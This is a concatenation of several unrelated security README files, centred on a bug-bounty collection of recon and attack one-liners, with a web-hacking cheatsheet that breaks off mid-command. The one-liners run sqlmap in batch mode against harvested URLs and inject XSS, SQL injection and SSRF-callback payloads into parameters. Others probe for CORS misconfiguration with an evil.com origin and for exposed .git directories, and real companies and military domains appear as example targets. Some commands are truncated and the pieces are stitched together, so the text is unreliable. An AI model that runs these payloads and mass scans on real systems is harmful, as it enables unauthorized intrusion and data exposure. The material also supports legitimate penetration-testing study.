Dependencies: # - curl # - jq function DomainResolve() { local _host="$1" local _curl_base="curl --request GET" local _timeout="15" _host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \ jq '.Answer[0].data' | tr -d "\"" 2>/dev/null) if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then echo -en "Unsuccessful domain name resolution.\\n" else echo -en "$_host > $_host_ip\\n" fi } ``` Example: ```bash shell> DomainResolve nmap.org nmap.org > 45.33.49.119 shell> DomainResolve nmap.org Unsuccessful domain name resolution. ``` ###### Get ASN ```bash # Dependencies: # - curl function GetASN() { local _ip="$1" local _curl_base="curl --request GET" local _timeout="15" _asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as") _state=$(echo $?) if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then echo -en "Unsuccessful ASN gathering.\\n" else echo -en "$_ip > $_asn\\n" fi } ``` Example: ```bash shell> GetASN 1.1.1.1 1.1.1.1 > AS13335 Cloudflare, Inc. shell> GetASN 0.0.0.0 Unsuccessful ASN gathering. ``` ## Source <b><code>104454⭐</code></b> <b><code>&nbsp;&nbsp;7528🍴</code></b> [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge))
# My Ethical Hacking Notes * This is where I'll be writing my notes on the topic of Ethical Hacking and whatever I learn about it: * [Learn Ethical Hacking From Scratch - Udemy](LearnEthicalHackingFromScratch_Udemy/README.md) * [CompTIA A+ 220-1001 - Professor Messer](CompTIA_220-1001/README.md) * [CompTIA A+ 220-1002 - Professor Messer](CompTIA_220-1002/README.md) * [CompTIA N10-007 Network+ - Professor Messer](CompTIA_N10-007/README.md) * [OverTheWire Wargames Writeups](https://github.com/SrivathsanNayak/overthewire) * [Practical Ethical Hacking - TCM Security](PracticalEthicalHacking_TCMSec/README.md) * [TryHackMe](TryHackMe/README.md) * [picoCTF](picoCTF/README.md) * [HackTheBox](HackTheBox/README.md) * [HackTheBox Academy](HTBAcademy/README.md) * [Cloud Security - Cisco Networking Academy](CloudSecurity/README.md) * [PortSwigger - Web Security Academy](PortSwigger/README.md) * [IBM Cybersecurity Analyst Professional Certificate - Coursera](CybersecurityAnalyst/README.md) * [Windows Privilege Escalation for Beginners - TCM Security](WindowsPrivilegeEscalation_TCMSec/README.md) * [Linux Privilege Escalation for Beginners - TCM Security](LinuxPrivilegeEscalation_TCMSec/README.md) * [Open-Source Intelligence (OSINT) Fundamentals - TCM Security](OSINT_TCMSec/README.md) * [External Pentest Playbook - TCM Security](Pentest_TCMSec/README.md) * [Python 101 For Hackers - TCM Security](Python101_TCMSec/README.md) * [200-301 CCNA - YouTube](CCNA/README.md) * [Linux 101 - TCM Security](Linux101_TCMSec/README.md) * [Movement, Pivoting and Persistence - TCM Security](MPP_TCMSec/README.md) * [Python 201 For Hackers - TCM Security](Python201_TCMSec/README.md) * [Mobile Application Penetration Testing - TCM Security](MobilePentest_TCMSec/README.md) * Some helpful resources: * [CyberChef](https://gchq.github.io/CyberChef/) * [GTFOBins](https://gtfobins.github.io/) * [PentestMonkey CheatSheet](https://pentestmonkey.net/category/cheat-sheet) * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [CheatSheet-God](https://github.com/OlivierLaflamme/Cheatsheet-God) * [Command Injection Payload List](https://github.com/payloadbox/command-injection-payload-list) * [Pentest CheatSheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) * [Steganography Resources](https://0xrick.github.io/lists/stego/) * Note: * These notes are made for documenting my progress in the domain of cybersecurity. * Everything here is a ```Work In Progress```; therefore some of the topics are empty or incomplete. * For CTF notes, I have included the flags as well, so if you do not want spoilers, tread carefully ;)
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. Want to earn 100 dollars using my code on ocean-digital? https://m.do.co/c/703ff752fd6f ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Gf](https://github.com/tomnomnom/gf) - [Unew](https://github.com/dwisiswant0/unew) - [Rush](https://github.com/shenwei356/rush) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Shuffledns](https://github.com/projectdiscovery/shuffledns) - [haktldextract](https://github.com/hakluke/haktldextract) - [Gau](https://github.com/lc/gau) - [Axiom](https://github.com/pry0cc/axiom) - [Html-tools](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Dalfox](https://github.com/hahwul/dalfox) - [Gowitness](https://github.com/sensepost/gowitness) - [Kxss](https://github.com/Emoe/kxss) - [Metabigor](https://github.com/j3ssie/metabigor) ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-01-30-1611965078-fdns_a.json.gz ; gunzip 2021-01-30-1611965078-fdns_a.json ; cat 2021-01-30-1611965078-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash amass enum -d $1 -o amass1 ; chaos -d $1 -o chaos1 -silent ; assetfinder $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 ; findomain -t $1 -q -u findomain1 ;python3 /root/PENTESTER/github-search/github-subdomains.py -t YOURTOKEN -d $1 >> github ; cat assetfinder1 subfinder1 chaos1 amass1 findomain1 subfinder1 github >> hosts ; subfinder -dL hosts -o full -timeout 10 -silent ; httpx -l hosts -silent -threads 9000 -timeout 30 | anew domains ; rm -rf amass1 chaos1 assetfinder1 subfinder1 findomain1 github ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash wget https://raw.githubusercontent.com/KingOfBugbounty/KingOfBugBountyTips/master/downlink ; xargs -a downlink -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash tac hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
## Web-Hacking Cheatsheet ### Gathering info on a web server #### Finding default content of web server using nikto ```sh nikto -h [HOST] -Tuning x ``` #### Analyze website using skipfish ```sh skipfish -o /root/output -S /usr/share/skipfish/dictionaries/complete.wl [HOST:8080] ``` #### Discover web directories using uniscan ```sh uniscan -u [HOST] -q ``` #### Discover robots.txt and sitemap.xml files using uniscan ```sh uniscan -u [HOST] -we ``` #### Perform dynamic tests using uniscan Obtains information about emails, source code disclosures, and external hosts. ```sh uniscan -u [HOST] -d ``` #### Perform a port and service discovery scan using nmap ```sh nmap -T4 -A -v [HOST] ``` #### Perform web application reconnaissance using WhatWeb WhatWeb recognizes web technologies, such as blogging platforms, email addresses, content management systems (CMS), account IDs, statistics and analytics packages, JavaScript libraries, and embedded devices. It also identifies version numbers, web servers, web framework modules, etc. ```sh whatweb [HOST] ``` ```sh whatweb -v [HOST] ``` #### Detect Load Balancers ```sh dig [HOST] ``` ```sh lbd [HOST] ``` #### Enumerate server using nmap (applications, directories, and files) ```sh nmap -sV --script http-enum [HOST] ``` #### Fast-paced enumeration of the hidden files and directories of the target web application using Gobuster ```sh gobuster dir -u [HOST] -w [DICTIONARY] ``` ### Attack website ```sh wpscan --api-token [API Token] --url [HOST] --plugins-detection aggressive 